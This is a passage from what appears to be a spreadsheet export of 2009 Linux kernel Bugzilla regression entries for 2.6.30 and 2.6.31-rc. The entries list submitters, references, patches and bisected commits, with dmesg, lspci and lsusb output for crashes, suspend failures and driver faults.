    <t>2009-06-28 21:26 UTC</t>
  </si>
  <si>
    <t>2009-07-07 11:03 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.30 fb/mmap lockdep report. Submitter : Dave Jones &lt;davej@redhat.com&gt; Date : 2009-06-21 13:33 References : http://lkml.org/lkml/2009/6/21/90 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Bad page state in process with various applications</t>
  </si>
  <si>
    <t>2009-06-28 21:46 UTC</t>
  </si>
  <si>
    <t>2009-07-27 22:05 UTC</t>
  </si>
  <si>
    <t>Subject : Strange oopses in 2.6.30 Submitter : Maxim Levitsky &lt;maximlevitsky@gmail.com&gt; Date : 2009-06-20 15:27 References : http://marc.info/?l=linux-mm&amp;m=124551168828090&amp;w=4 Handled-By : Mel Gorman &lt;mel@csn.ul.ie&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Problem with alloc_arch_preferred_bootmem() on powerpc</t>
  </si>
  <si>
    <t>2009-06-28 21:52 UTC</t>
  </si>
  <si>
    <t>2009-07-26 22:52 UTC</t>
  </si>
  <si>
    <t>Subject : Badness on the Warp Submitter : Sean MacLennan &lt;smaclennan@pikatech.com&gt; Date : 2009-06-20 19:48 References : http://marc.info/?l=linuxppc-embedded&amp;m=124552732411775&amp;w=4 Notify-Also : Benjamin Herrenschmidt &lt;benh@kernel.crashing.org&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>system hangs after resume from suspend to disk, mce related</t>
  </si>
  <si>
    <t>2009-06-28 22:13 UTC</t>
  </si>
  <si>
    <t>2009-07-04 21:52 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.30-git(16 and 17) system hangs after resume from suspend to disk, mce related? Submitter : Maciej Rutecki &lt;maciej.rutecki@gmail.com&gt; Date : 2009-06-21 19:02 References : http://lkml.org/lkml/2009/6/21/86 Handled-By : Hidetoshi Seto &lt;seto.hidetoshi@jp.fujitsu.com&gt; Patch : http://patchwork.kernel.org/patch/32062/ Notify-Also : Andi Kleen &lt;ak@linux.intel.com&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>possible recursive locking detected at kmem_cache_free</t>
  </si>
  <si>
    <t>2009-06-28 22:20 UTC</t>
  </si>
  <si>
    <t>2009-07-06 23:30 UTC</t>
  </si>
  <si>
    <t>Subject : possible recursive locking detected at kmem_cache_free Submitter : "Pallipadi, Venkatesh" &lt;venkatesh.pallipadi@intel.com&gt; Date : 2009-06-25 11:59 References : http://lkml.org/lkml/2009/6/25/373 Handled-By : Pekka J Enberg &lt;penberg@cs.helsinki.fi&gt; Patch : http://patchwork.kernel.org/patch/32525/ This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.31-rc1 crashes randomly on my Machine.</t>
  </si>
  <si>
    <t>2009-06-28 22:27 UTC</t>
  </si>
  <si>
    <t>2009-08-12 12:36 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-rc1 crashes randomly on my Machine. Submitter : Zeno Davatz &lt;zdavatz@gmail.com&gt; Date : 2009-06-26 08:56 References : http://lkml.org/lkml/2009/6/26/27 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Linux-2.6.31-rc1 Fails To Recognize Some USB Disks</t>
  </si>
  <si>
    <t>2009-06-28 22:30 UTC</t>
  </si>
  <si>
    <t>2009-08-09 23:04 UTC</t>
  </si>
  <si>
    <t>Subject : Linux-2.6.31-rc1 Fails To Recognize Some USB Disks Submitter : Tarkan Erimer &lt;tarkan.erimer@turknet.net.tr&gt; Date : 2009-06-26 10:03 References : http://lkml.org/lkml/2009/6/26/34 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>parisc: multiple PCI BAR collisions</t>
  </si>
  <si>
    <t>2009-06-28 22:35 UTC</t>
  </si>
  <si>
    <t>2009-07-06 23:29 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-rc1: parisc: multiple PCI BAR collisions Submitter : Alexander Beregalov &lt;a.beregalov@gmail.com&gt; Date : 2009-06-26 12:58 References : http://lkml.org/lkml/2009/6/26/87 Handled-By : Matthew Wilcox &lt;matthew@wil.cx&gt; Patch : http://patchwork.kernel.org/patch/32593/ This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>iwlagn (4965): no wireless due to RFKILL problem</t>
  </si>
  <si>
    <t>2009-06-28 22:39 UTC</t>
  </si>
  <si>
    <t>2009-07-27 22:16 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.31-rc1] iwlagn (4965): no wireless due to RFKILL problem Submitter : Frans Pop &lt;elendil@planet.nl&gt; Date : 2009-06-26 13:36 References : http://lkml.org/lkml/2009/6/26/127 Handled-By : Johannes Berg &lt;johannes@sipsolutions.net&gt; Patch : http://lkml.org/lkml/2009/6/27/35 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Crashes during boot on 2.6.30 / 2.6.31-rc, random programs</t>
  </si>
  <si>
    <t>2009-06-28 22:42 UTC</t>
  </si>
  <si>
    <t>2009-08-17 18:18 UTC</t>
  </si>
  <si>
    <t>Subject : Crashes during boot on 2.6.30 / 2.6.31-rc, random programs Submitter : Joao Correia &lt;joaomiguelcorreia@gmail.com&gt; Date : 2009-06-27 16:07 References : http://lkml.org/lkml/2009/6/27/95 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Failure to resume from S2R</t>
  </si>
  <si>
    <t>2009-06-28 22:45 UTC</t>
  </si>
  <si>
    <t>2009-07-26 23:01 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-rc1: warning in smp_call_function_single while S2R Submitter : Thomas Meyer &lt;thomas@m3y3r.de&gt; Date : 2009-06-27 17:12 References : http://lkml.org/lkml/2009/6/27/80 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>broken alpha smp build</t>
  </si>
  <si>
    <t>2009-06-28 22:51 UTC</t>
  </si>
  <si>
    <t>2009-07-06 23:26 UTC</t>
  </si>
  <si>
    <t>Subject : &gt;= 2.6.30 broken alpha smp build Submitter : maximilian attems &lt;max@stro.at&gt; Date : 2009-06-25 11:08 References : http://lkml.org/lkml/2009/6/25/108 Notify-Also : Andrew Morton &lt;akpm@linux-foundation.org&gt; Notify-Also : Ivan Kokshaysky &lt;ink@jurassic.park.msu.ru&gt; Handled-By : Tejun Heo &lt;tj@kernel.org&gt; Patch : http://patchwork.kernel.org/patch/32714/ This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>suspend to ram regression (IDE related)</t>
  </si>
  <si>
    <t>2009-06-28 22:57 UTC</t>
  </si>
  <si>
    <t>2009-07-07 20:32 UTC</t>
  </si>
  <si>
    <t>Subject : [REGRESSION] 2.6.29=&gt;2.6.30 suspend to ram regression (IDE related) Submitter : Etienne Basset &lt;etienne.basset@numericable.fr&gt; Notify-Also : Jeff Chua &lt;jeff.chua.linux@gmail.com&gt; Date : 2009-06-26 17:40 References : http://lkml.org/lkml/2009/6/26/242 Handled-By : Bartlomiej Zolnierkiewicz &lt;bzolnier@gmail.com&gt; Patch : http://patchwork.kernel.org/patch/32719/ This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>commit 69c854817566 causes OOMs</t>
  </si>
  <si>
    <t>2009-06-28 23:05 UTC</t>
  </si>
  <si>
    <t>2009-07-28 20:54 UTC</t>
  </si>
  <si>
    <t>Subject : Found the commit that causes the OOMs Submitter : David Howells &lt;dhowells@redhat.com&gt; Date : 2009-06-27 08:12 References : http://lkml.org/lkml/2009/6/27/28 Handled-By : Wu Fengguang &lt;fengguang.wu@intel.com&gt; Patch : http://patchwork.kernel.org/patch/32740/ This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline. Caused by: commit 69c854817566db82c362797b4a6521d0b00fe1d8 Author: MinChan Kim &lt;minchan.kim@gmail.com&gt; Date: Tue Jun 16 15:32:44 2009 -0700 vmscan: prevent shrinking of active anon lru list in case of no swap space V3 First-Bad-Commit : 69c854817566db82c362797b4a6521d0b00fe1d8</t>
  </si>
  <si>
    <t>WARNING: at mm/page_alloc.c:1743 __alloc_pages_nodemask</t>
  </si>
  <si>
    <t>2009-06-28 23:07 UTC</t>
  </si>
  <si>
    <t>2009-08-02 20:22 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-rc1: WARNING: at mm/page_alloc.c:1743 __alloc_pages_nodemask Submitter : Thomas Meyer &lt;thomas@m3y3r.de&gt; Date : 2009-06-27 16:15 References : http://lkml.org/lkml/2009/6/27/75 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Kernel bug with dock driver</t>
  </si>
  <si>
    <t>2.6.27 2.7.28 2.6.29 2.6.30</t>
  </si>
  <si>
    <t>2009-06-28 23:24 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.30] Kernel bug with dock driver Submitter : Joerg Platte &lt;jplatte@naasa.net&gt; Date : 2009-06-14 21:00 References : http://lkml.org/lkml/2009/6/14/216 Handled-By : Henrique de Moraes Holschuh &lt;hmh@hmh.eng.br&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Cannot get a snapshot from an logical volume</t>
  </si>
  <si>
    <t>2.6.31-rc1-git3</t>
  </si>
  <si>
    <t>2009-06-29 13:11 UTC</t>
  </si>
  <si>
    <t>2009-07-01 10:31 UTC</t>
  </si>
  <si>
    <t>Distribution : Debian sid System : athlon64 x2 4200+ Architecture : x86_64 This is working on 2.6.30 I want to get a snapshot of an lvm logical volume (encrypted, XFS filesystem) I get: [jean-luc@tangerine] % sudo lvcreate -l 500 -s -n snap /dev/cryptvg0/home_lv device-mapper: reload ioctl failed: invalid parameter Failed to suspend origin home_lv With 2.6.30, I get: [jean-luc@tangerine] % sudo lvcreate -l 500 -s -n snap /dev/cryptvg0/home_lv Logical volume "snap" created Maybe this is related to http://bugzilla.kernel.org/show_bug.cgi?id=13641 Regards Jean-Luc</t>
  </si>
  <si>
    <t>HIGHMEM64G causes hang in PCI init on 32-bit x86</t>
  </si>
  <si>
    <t>2009-06-29 14:14 UTC</t>
  </si>
  <si>
    <t>2009-07-07 11:12 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG 2.6.31-rc1] HIGHMEM64G causes hang in PCI init on 32-bit x86 Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Date : 2009-06-26 15:59 References : http://marc.info/?l=linux-pci&amp;m=124615181602643&amp;w=4 Handled-By : "H. Peter Anvin" &lt;hpa@zytor.com&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline. Caused by: commit 95ee14e4379c5e19c0897c872350570402014742 Author: H. Peter Anvin &lt;hpa@zytor.com&gt; Date: Tue Jun 9 18:20:39 2009 -0700 x86: cap iomem_resource to addressable physical memory First-Bad-Commit : 95ee14e4379c5e19c0897c872350570402014742 Notify-Also : Grant Grundler &lt;grundler@parisc-linux.org&gt; Notify-Also : Matthew Wilcox &lt;matthew@wil.cx&gt;</t>
  </si>
  <si>
    <t>check-lxdialog.sh mixes wide ncurses library with non wide (narrow) ncurses headers</t>
  </si>
  <si>
    <t>2009-06-29 19:46 UTC</t>
  </si>
  <si>
    <t>Arkadiusz Miskiewicz</t>
  </si>
  <si>
    <t>2012-06-12 10:18 UTC</t>
  </si>
  <si>
    <t>make menuconfig menus are black and wide due to check-lxdialog.sh being not smart enough. Theory: Wide ncurses can be built with --enable-ext-colors. That option enables 256 color support. Such ncurses have different definitions in some headers. The important thing is that wide headers are incompatible with narrow headers. Using narrow headers with wide library means no colors! Just black and white ncurses. Unfortunately check-lxdialog.sh is first trying to use wide ncurses but it doesn't verify that it has wide headers. On my Linux this means that wide library is used with narrow headers -&gt; no colors in ncurses app (like make menuconfig) Solution: 1) don't use wide ncurses at all 2) verify that we have wide headers when using wide ncurses, otherwise use narrow ncurses and narrow headers</t>
  </si>
  <si>
    <t>The webcam stopped working when upgrading from 2.6.29 to 2.6.30</t>
  </si>
  <si>
    <t>2009-06-30 13:34 UTC</t>
  </si>
  <si>
    <t>Nathanael Schaeffer</t>
  </si>
  <si>
    <t>2009-12-29 20:50 UTC</t>
  </si>
  <si>
    <t>Several archlinux users with a samsung nc10 netbook experience this problem. The webcam stopped working with the latest kernel upgrade. Precisions : - the module is loaded (uvcvideo) - solid black is displayed instead of the picture. - this happens with skype, and also with "xawtv -c /dev/video0" and any other webcam capture tested so far. A bug has also been filed to the archlinux team : http://bugs.archlinux.org/task/15319 And a discussion has started here : http://bbs.archlinux.org/viewtopic.php?id=74828</t>
  </si>
  <si>
    <t>Internal Laptopdisplay blurrys to white screen after enabling modesetting on Radeon X700 Mobility</t>
  </si>
  <si>
    <t>2.6.31-rc9</t>
  </si>
  <si>
    <t>2009-06-30 15:47 UTC</t>
  </si>
  <si>
    <t>Jan Kreuzer</t>
  </si>
  <si>
    <t>2010-09-02 19:58 UTC</t>
  </si>
  <si>
    <t>Created attachment 22148 [details] dmesg of failing modeset with drm.debug=1 When KMS is enabled the internal Laptop-Display of becomes an all white screen, instead of displaying anything useful. Notebook is an Uniwill P50CA Clone, made by Fujitsu-Siemens, Modell is Amilo A1667G. Graphics is PCIE Ati Radeon Mobility.</t>
  </si>
  <si>
    <t>[PATCH] Work around negative s16 battery current on Acer</t>
  </si>
  <si>
    <t>2009-07-01 18:06 UTC</t>
  </si>
  <si>
    <t>2009-11-25 03:03 UTC</t>
  </si>
  <si>
    <t>Created attachment 22169 [details] Add battery quirk to interpret current as s16 My Acer Aspire 8930G laptop reports the battery current as a 16-bit signed negative when it is charging. It also reports it as 0x10000 when the current is 0. This patch adds a quirk for this which takes the absolute value of the reported current cast to an s16. This is a DSDT bug present in the latest BIOS revision (the EC register is 16 bits signed and the DSDT attempts to take the 16-bit two's complement of this, which works for discharge but not charge. It also breaks zero values because a 32-bit register is used and the high bits aren't thrown away). I've enabled this for all Acer systems which report in mA units. This should be safe since it won't break compliant systems unless they report a current above 32A, which is insane.</t>
  </si>
  <si>
    <t>nodes_clear cause hugepage unusable on non-NUMA machine</t>
  </si>
  <si>
    <t>2009-07-02 01:22 UTC</t>
  </si>
  <si>
    <t>2009-07-26 23:03 UTC</t>
  </si>
  <si>
    <t>73d60b7f747176dbdff826c4127d22e1fd3f9f74 commit introduced a nodes_clear function for NUMA machine. But seems the commit omits non-NUMA machine. If find_zone_movable_pfns_for_nodes/early_calculate_totalpages has no chance to run. nodes_clear will block HUPEPAGE using in my specjbb2005 testing on my Stoakely(i386/x86_64), waybridge(i386), IBM T61(i386) + /* + * find_zone_movable_pfns_for_nodes/early_calculate_totalpages init + * that node_mask, clear it at first + */ + nodes_clear(node_states[N_HIGH_MEMORY]);</t>
  </si>
  <si>
    <t>i915 phantom TV</t>
  </si>
  <si>
    <t>2009-07-02 12:26 UTC</t>
  </si>
  <si>
    <t>Maciek Józiewicz</t>
  </si>
  <si>
    <t>2009-08-26 13:48 UTC</t>
  </si>
  <si>
    <t>I have a Lenovo N200 0769-EAG with a 965GM. I was happily using rcs of 2.6.30 with KMS enabled and it all worked fine. However the final 2.6.30 boots up in native 1280x800, but the fb is restricted to 1024x768 from the upper left corner. In X I get a proper 1280x800 and xrandr reports TV is disconnected (even if I connect, I suppose there is no support yet - I'm using the git version of xf86-video-intel) and I can use my VGA output without problems.That's what dmesg says: Linux agpgart interface v0.103 agpgart-intel 0000:00:00.0: Intel 965GM Chipset agpgart-intel 0000:00:00.0: detected 7676K stolen memory agpgart-intel 0000:00:00.0: AGP aperture is 256M @ 0xd0000000 ... [drm] Initialized drm 1.1.0 20060810 i915 0000:00:02.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 i915 0000:00:02.0: setting latency timer to 64 i915 0000:00:02.0: irq 28 for MSI/MSI-X ACPI: Battery Slot [BAT1] (battery present) allocated 1280x800 fb: 0x007df000, bo ffff88007def8240 [drm] TV-13: set mode 1024x768 18 [drm] LVDS-8: set mode 1280x800 15 Console: switching to colour frame buffer device 128x48 fb0: inteldrmfb frame buffer device registered panic notifier acpi device:0a: registered as cooling_device2 input: Video Bus as /class/input/input3 ACPI: Video Device [GFX0] (multi-head: yes rom: no post: no) [drm] Initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 ***************************************** * some more info * ***************************************** nomad szczerb # lspci 00:00.0 Host bridge: Intel Corporation Mobile PM965/GM965/GL960 Memory Controller Hub (rev 0c) 00:02.0 VGA compatible controller: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 0c) 00:02.1 Display controller: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 0c) 00:1a.0 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #4 (rev 03) 00:1a.1 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #5 (rev 03) 00:1a.7 USB Controller: Intel Corporation 82801H (ICH8 Family) USB2 EHCI Controller #2 (rev 03) 00:1b.0 Audio device: Intel Corporation 82801H (ICH8 Family) HD Audio Controller (rev 03) 00:1c.0 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 1 (rev 03) 00:1c.1 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 2 (rev 03) 00:1c.2 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 3 (rev 03) 00:1c.3 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 4 (rev 03) 00:1d.0 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #1 (rev 03) 00:1d.1 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #2 (rev 03) 00:1d.2 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #3 (rev 03) 00:1d.7 USB Controller: Intel Corporation 82801H (ICH8 Family) USB2 EHCI Controller #1 (rev 03) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev f3) 00:1f.0 ISA bridge: Intel Corporation 82801HEM (ICH8M) LPC Interface Controller (rev 03) 00:1f.1 IDE interface: Intel Corporation 82801HBM/HEM (ICH8M/ICH8M-E) IDE Controller (rev 03) 00:1f.2 SATA controller: Intel Corporation 82801HBM/HEM (ICH8M/ICH8M-E) SATA AHCI Controller (rev 03) 00:1f.3 SMBus: Intel Corporation 82801H (ICH8 Family) SMBus Controller (rev 03) 04:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG [Golan] Network Connection (rev 02) 06:00.0 Ethernet controller: Broadcom Corporation NetLink BCM5906M Fast Ethernet PCI Express (rev 02) 08:06.0 FireWire (IEEE 1394): Ricoh Co Ltd R5C832 IEEE 1394 Controller 08:06.1 SD Host controller: Ricoh Co Ltd R5C822 SD/SDIO/MMC/MS/MSPro Host Adapter (rev 19) 08:06.2 System peripheral: Ricoh Co Ltd R5C843 MMC Host Controller (rev 0a) 08:06.3 System peripheral: Ricoh Co Ltd R5C592 Memory Stick Bus Host Adapter (rev 05) 08:06.4 System peripheral: Ricoh Co Ltd xD-Picture Card Controller (rev ff) ******************************************** nomad szczerb # lspci -s 00:02 -vv 00:02.0 VGA compatible controller: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 0c) (prog-if 00 [VGA controller]) Subsystem: Lenovo Device 383e Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 28 Region 0: Memory at fc000000 (64-bit, non-prefetchable) [size=1M] Region 2: Memory at d0000000 (64-bit, prefetchable) [size=256M] Region 4: I/O ports at 1800 [size=8] Capabilities: [90] Message Signalled Interrupts: Mask- 64bit- Count=1/1 Enable+ Address: fee0300c Data: 4189 Capabilities: [d0] Power Management version 3 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Bridge: PM- B3+ Kernel driver in use: i915 00:02.1 Display controller: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 0c) Subsystem: Lenovo Device 383e Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Region 0: Memory at fc100000 (64-bit, non-prefetchable) [size=1M] Capabilities: [d0] Power Management version 3 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Bridge: PM- B3+</t>
  </si>
  <si>
    <t>usb error flood in dmesg, makes kde use plenty of cpu - bisected</t>
  </si>
  <si>
    <t>2.6.30-rc1 and later</t>
  </si>
  <si>
    <t>2009-07-03 21:13 UTC</t>
  </si>
  <si>
    <t>jouni susiluoto</t>
  </si>
  <si>
    <t>2009-07-27 22:22 UTC</t>
  </si>
  <si>
    <t>Daniel Mack</t>
  </si>
  <si>
    <t>Created attachment 22197 [details] lsusb -v from nonworking system With all kernels after (copied from git-bisect...) 54530bded6ecf22d683423b66fc3cd6dddb249aa is first bad commit commit 54530bded6ecf22d683423b66fc3cd6dddb249aa Author: Takashi Iwai &lt;tiwai@suse.de&gt; Date: Thu Feb 5 15:55:18 2009 +0100 ALSA: usb - Add missing KERN_* prefix to printk Signed-off-by: Takashi Iwai &lt;tiwai@suse.de&gt; :040000 040000 c9808b346d4581fd1c6df76a7a00ad29853a6250 5ab0b206b85c5b54c6a5809b4d14c1a86778442b M sound I get the following errors in dmesg: [ 9009.206070] usb 5-2: new low speed USB device using uhci_hcd and address 101 [ 9009.365159] usb 5-2: string descriptor 0 read error: -32 [ 9009.387159] usb 5-2: New USB device found, idVendor=043e, idProduct=9802 [ 9009.387167] usb 5-2: New USB device strings: Mfr=0, Product=1, SerialNumber=0 [ 9009.387314] usb 5-2: configuration #1 chosen from 1 choice [ 9009.395821] usb 5-2: can't set config #1, error -71 [ 9009.395931] usb 5-2: USB disconnect, address 101 [ 9009.956068] usb 5-2: new low speed USB device using uhci_hcd and address 102 [ 9010.115158] usb 5-2: string descriptor 0 read error: -32 [ 9010.134159] usb 5-2: New USB device found, idVendor=043e, idProduct=9802 [ 9010.134166] usb 5-2: New USB device strings: Mfr=0, Product=1, SerialNumber=0 [ 9010.134322] usb 5-2: configuration #1 chosen from 1 choice [ 9010.138154] usb 5-2: can't set config #1, error -71 [ 9010.138273] usb 5-2: USB disconnect, address 102 With a working kernel, like 2.6.29.5, the the usb section 5-2 reads: [ 6.878042] usb 5-2: new low speed USB device using uhci_hcd and address 2 [ 7.037499] usb 5-2: string descriptor 0 read error: -32 [ 7.037546] usb 5-2: New USB device found, idVendor=043e, idProduct=9802 [ 7.037549] usb 5-2: New USB device strings: Mfr=0, Product=1, SerialNumber=0 [ 7.040584] usb 5-2: configuration #1 chosen from 1 choice lsusb for 2.6.29.5 is: Bus 005 Device 002: ID 043e:9802 LG Electronics USA, Inc. Bus 005 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 004 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 003 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub and for later kernels, it is the same, but the first line is completely missing. Attached are lsusb -v from both nonworking and working systems, and .config of the latest tested nonworking kernel version, 2.6.31-rc1-git3.</t>
  </si>
  <si>
    <t>rt2500pci: MASQUERADE not working since 2.6.27</t>
  </si>
  <si>
    <t>2.6.27, 2.6.28, 2.6.29, 2.6.30</t>
  </si>
  <si>
    <t>2009-07-04 19:01 UTC</t>
  </si>
  <si>
    <t>Tomasz Moń</t>
  </si>
  <si>
    <t>2010-02-27 15:01 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian with mainline kernel Hardware Environment: Gigabyte GN-WPKG 802.11b/g, nVidia MCP61 Ethernet, AMD Athlon 64 X2 Software Environment: Debian testing/unstable Wireless card connects to internet connected network and shares its connection over ethernet. the iptable rule to get connection sharing working is as follows: iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE This was working fine up to 2.6.26. Beginning with 2.6.27 it's no longer working. It's still the case with 2.6.30. I'm unable to do bisect, because way too many changesets between 2.6.26 and 2.6.27 have completely broken rt2500pci driver. If I replace the Gigabyte GN-WPKG wireless card with Atheros based one, connection sharing works as expected with newer kernels.</t>
  </si>
  <si>
    <t>Aiptek DV-T300 support is incomplete</t>
  </si>
  <si>
    <t>2009-07-04 22:06 UTC</t>
  </si>
  <si>
    <t>Balázs Hámorszky</t>
  </si>
  <si>
    <t>2012-06-12 10:23 UTC</t>
  </si>
  <si>
    <t>Created attachment 22209 [details] resolution patch I have a DV-T300, and it's not fully supported at the current state of the kernel. The resolution of the camera differs. I have ported a patch to 2.6.29, that solves the resolution problem, but the driver freezes after a few seconds. With 2.6.30 the driver isn't work at all. Cheese and Ekiga just don't recognize the camera (I have another camera that works flawlessly).</t>
  </si>
  <si>
    <t>b2c2-flexcop: no frontend driver found for this B2C2/FlexCop adapter w/ kernel-2.6.31-rc2</t>
  </si>
  <si>
    <t>2009-07-05 01:36 UTC</t>
  </si>
  <si>
    <t>boris64</t>
  </si>
  <si>
    <t>2009-07-29 23:54 UTC</t>
  </si>
  <si>
    <t>Hi kernel people! Since kernel-2.6.31-rc1 my Technisat SkyStar2 DVB card isn't working anymore, because no frontend driver is found. The frontend 'ST STV0299 DVB-S' is compiled into the kernel and _did_ work fine in pre-2.6.31 kernels. [lspci] ... 05:02.0 Network controller: Techsan Electronics Co Ltd B2C2 FlexCopII DVB chip / Technisat SkyStar2 DVB card (rev 02) [/lspci] [dmesg] Working kernel-2.6.30.1: ------------------------ ... b2c2-flexcop: B2C2 FlexcopII/II(b)/III digital TV receiver chip loaded successfully b2c2_flexcop_pci 0000:05:02.0: PCI INT A -&gt; GSI 18 (level, low) -&gt; IRQ 18 b2c2-flexcop: MAC address = 00:d0:d7:0f:30:58 b2c2-flexcop: found 'ST STV0299 DVB-S' . b2c2-flexcop: initialization of 'Air2PC/AirStar 2 ATSC 3rd generation (HD5000)' at the 'PCI' bus controlled by a 'FlexCopIIb' complete ... Non-working kernel-2.6.31-rc: ------------------------ ... b2c2-flexcop: B2C2 FlexcopII/II(b)/III digital TV receiver chip loaded successfully b2c2_flexcop_pci 0000:05:02.0: PCI INT A -&gt; GSI 18 (level, low) -&gt; IRQ 18 b2c2-flexcop: MAC address = 00:d0:d7:0f:30:58 b2c2-flexcop: no frontend driver found for this B2C2/FlexCop adapter b2c2_flexcop_pci 0000:05:02.0: PCI INT A disabled ... [/dmesg] I'll attach full dmesg+lspci. Please feel free to contact me if you need more infos. Thank you in advance ;)</t>
  </si>
  <si>
    <t>Corrupted low memory after resume</t>
  </si>
  <si>
    <t>2009-07-05 05:37 UTC</t>
  </si>
  <si>
    <t>2009-08-30 02:34 UTC</t>
  </si>
  <si>
    <t>Created attachment 22215 [details] dmesg It was tested with latest linux-2.6 git and drm-linux. To make clean test i used test_suspend=mem with acpi_sleep options (s3_bios and/or s3_mode) and without acpi_sleep. Any acpi_sleep option will make my PC freeze. Without acpi_sleep it will resume but with black screen and i can access it with ssh. Disabling kms will resume with black console but Xorg will enable video. After resume dmesg has two traces, memory corruption and warn_slowpath_common: [ 60.816159] Corrupted low memory at ffff880000004200 (4200 phys) = 00420301 [ 60.816163] ------------[ cut here ]------------ [ 60.816169] WARNING: at arch/x86/kernel/check.c:134 check_for_bios_corruption+0xe4/0xf0() [ 60.816171] Hardware name: [ 60.816172] Memory corruption detected in low memory [ 60.816173] Modules linked in: binfmt_misc kvm_intel kvm snd_hda_codec_intelhdmi snd_hda_codec_idt snd_hda_intel snd_hda_codec snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_dummy snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device psmouse snd iTCO_wdt iTCO_vendor_support serio_raw soundcore snd_page_alloc e1000e [ 60.816190] Pid: 9, comm: events/0 Tainted: G W 2.6.31-rc1-25446-g1ae8c0a #1 [ 60.816192] Call Trace: [ 60.816196] [&lt;ffffffff8104a8e8&gt;] warn_slowpath_common+0x78/0xb0 [ 60.816198] [&lt;ffffffff8104a97c&gt;] warn_slowpath_fmt+0x3c/0x40 [ 60.816200] [&lt;ffffffff8102aff4&gt;] check_for_bios_corruption+0xe4/0xf0 [ 60.816202] [&lt;ffffffff8102b000&gt;] ? check_corruption+0x0/0x30 [ 60.816204] [&lt;ffffffff8102b009&gt;] check_corruption+0x9/0x30 [ 60.816206] 